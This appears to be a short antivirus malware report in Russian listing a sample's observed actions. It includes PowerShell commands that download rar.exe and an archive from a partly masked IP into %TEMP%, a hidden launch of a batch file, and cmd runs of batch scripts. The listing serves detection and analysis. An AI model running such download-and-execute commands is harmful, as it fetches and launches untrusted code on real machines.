Техническая информация
- '<SYSTEM32>\findstr.exe' brtopi "*.*"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Invoke-WebRequest -Uri "http://18#.#06.120.31/rar.exe" -OutFile "%TEMP%\rar.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Invoke-WebRequest -Uri "http://18#.#06.120.31/trg.rar" -OutFile "%TEMP%\tpg.rar"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-Process -FilePath "%TEMP%\brk.bat" -WindowStyle hidden
- %TEMP%\brtopi.bat
- %TEMP%\brtopi12.txt
- %TEMP%\brttopiz.bat
- %TEMP%\brttopiz.bat
- '<SYSTEM32>\cmd.exe' /c findstr brtopi "*.*"
- '<SYSTEM32>\cmd.exe' /K %TEMP%\brtopi.bat